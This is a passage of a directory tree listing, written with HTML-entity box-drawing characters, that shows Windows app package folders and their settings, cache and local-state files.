&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.StorePurchaseApp_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.VP9VideoExtensions_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Wallet_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.WebMediaExtensions_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.WebpImageExtension_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Win32WebViewHost_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.WindowsAlarms_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.WindowsCalculator_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Windows.CallingShellApp_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.WindowsCamera_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Windows.CapturePicker_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MicrosoftWindows.Client.CBS_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; microsoft.windowscommunicationsapps_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AC
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; INetCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; INetCookies
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; ESE
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; INetHistory
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; BackgroundTransferApi
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Microsoft
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; CryptnetUrlCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Content
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 57C8EDB95DF3F0AD4EE2DC2B8CFD4157
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 77EC63BDA74BD0D0E0426DC8F8008506
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; FB0D848F74F70BB2EAA93746D24D9749
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; MetaData
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; 57C8EDB95DF3F0AD4EE2DC2B8CFD4157
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; 77EC63BDA74BD0D0E0426DC8F8008506
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9492;&#9472;&#9472; FB0D848F74F70BB2EAA93746D24D9749
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LocalState
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; HxCommAlwaysOnLog.etl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; HxCommAlwaysOnLog_Old.etl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; HxStore.hxd
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; TempState
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; universal_outlook_test.dat64
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AC
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; BackgroundTransferApi
